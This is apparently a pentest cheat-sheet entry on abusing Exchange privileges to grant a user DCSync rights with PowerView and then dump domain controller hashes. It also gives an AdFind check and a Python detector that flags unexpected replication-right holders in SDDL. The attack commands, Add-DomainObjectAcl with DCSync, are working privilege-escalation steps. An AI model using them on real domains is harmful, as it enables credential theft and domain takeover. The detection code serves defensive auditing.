With existing Exchange server privileges, write an ACL (WriteDACL) granting a chosen user DCSync rights, then use DCSync to dump the domain controller hashes.
Script URL:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Command line:
# PowerView.ps1 script from the Empire bundle
Import-Module .\powerview.ps1;
Add-DomainObjectAcl -TargetIdentity 'DC=hacktest,DC=com' -PrincipalIdentity <domain user> -Rights DCSync -Verbose
# Remove the DCSync rights from the specified user
Remove-DomainObjectAcl -TargetIdentity 'DC=hacktest,DC=com' -PrincipalIdentity <domain user> -Rights DCSync -Verbose
Use AdFind to check whether the ACE for user aaa was written successfully (the GUID filtered on is the DS-Replication-Get-Changes extended right):
AdFind.exe -s subtree -b "DC=hacktest,DC=com" nTSecurityDescriptor -sddl -sddlfilter ;;;"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2";; -recmute -resolvesids
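The AdFind query above is the same check a defender runs to audit who holds replication rights on the domain naming context. As an added example that is not part of the original page or of PowerView or AdFind, the following Python parses an SDDL string (such as the -sddl output above) and reports every trustee granted the DS-Replication-Get-Changes right from the page, plus DS-Replication-Get-Changes-All, which DCSync also needs. The SDDL sample, the domain SID and the RID 1108 are constructed; the set of expected trustees (Domain Admins, Enterprise Admins, Enterprise Domain Controllers, Builtin Administrators, SYSTEM) is an assumption to be adjusted per environment.

```python
import re
from dataclasses import dataclass

# Extended-right GUIDs DCSync relies on. The first is the GUID used in the
# AdFind filter on this page; the second (Get-Changes-All) is its companion.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}

# SDDL aliases that are expected to hold replication rights on a domain NC
# (assumption: tune this allow-list for your own forest).
EXPECTED_TRUSTEES = {"DA", "EA", "ED", "BA", "SY"}

CONTROL_ACCESS = 0x100      # ADS_RIGHT_DS_CONTROL_ACCESS
GENERIC_ALL = 0x10000000    # GENERIC_ALL implies every extended right


@dataclass
class Ace:
    ace_type: str      # A, OA, D, OD, ...
    flags: str
    rights: str        # two-letter codes or 0x... hex mask
    object_guid: str   # extended-right / attribute GUID for object ACEs
    inherit_guid: str
    trustee: str       # SID string or well-known alias


ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_dacl(sddl: str) -> list[Ace]:
    """Return the ACEs of the DACL part (D:...) of an SDDL string."""
    start = sddl.find("D:")
    if start < 0:
        return []
    dacl = sddl[start + 2:]
    sacl = dacl.find("S:")           # stop at the SACL if one is present
    if sacl >= 0:
        dacl = dacl[:sacl]
    aces = []
    for match in ACE_RE.finditer(dacl):
        parts = match.group(1).split(";")
        if len(parts) >= 6:          # ignore conditional/resource ACE extras
            aces.append(Ace(*parts[:6]))
    return aces


def _rights_tokens(rights: str) -> set[str]:
    """Split the rights field into two-letter codes; map hex masks to CR/GA."""
    if rights.startswith("0x"):
        mask = int(rights, 16)
        tokens = set()
        if mask & CONTROL_ACCESS:
            tokens.add("CR")
        if mask & GENERIC_ALL:
            tokens.add("GA")
        return tokens
    # Never use substring search here: "LCRP" contains "CR" but grants no CR.
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def find_dcsync_grants(sddl: str) -> dict[str, set[str]]:
    """Map trustee -> replication rights granted to it by allow ACEs."""
    grants: dict[str, set[str]] = {}
    for ace in parse_dacl(sddl):
        if ace.ace_type not in ("A", "OA"):
            continue                 # only allow ACEs grant anything
        tokens = _rights_tokens(ace.rights)
        if not (tokens & {"CR", "GA"}):
            continue
        if ace.object_guid:
            name = REPLICATION_RIGHTS.get(ace.object_guid.lower())
            if name is None:
                continue             # some other extended right
            granted = {name}
        else:
            granted = {"ALL-EXTENDED-RIGHTS"}  # CR/GA with no GUID = all
        grants.setdefault(ace.trustee, set()).update(granted)
    return grants


def unexpected_dcsync_trustees(sddl: str, expected=EXPECTED_TRUSTEES) -> dict[str, set[str]]:
    """Trustees holding replication rights that are not on the allow-list."""
    return {t: r for t, r in find_dcsync_grants(sddl).items() if t not in expected}


# Constructed sample: a domain-NC descriptor where RID 1108 was granted both
# replication rights, exactly the state the Add-DomainObjectAcl command leaves.
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI"
    "(A;;RPLCLORC;;;AU)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;DA)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DA)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-111-222-333-1108)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-111-222-333-1108)"
    "(A;;GA;;;SY)"
)

if __name__ == "__main__":
    for trustee, rights in unexpected_dcsync_trustees(SAMPLE_SDDL).items():
        print(f"ALERT: {trustee} holds {sorted(rights)}")
```

Feed it the nTSecurityDescriptor of the domain head and resolve any flagged SID that is not a domain controller or tier-0 group; a plain user holding both replication rights is the footprint this page's Add-DomainObjectAcl command leaves behind.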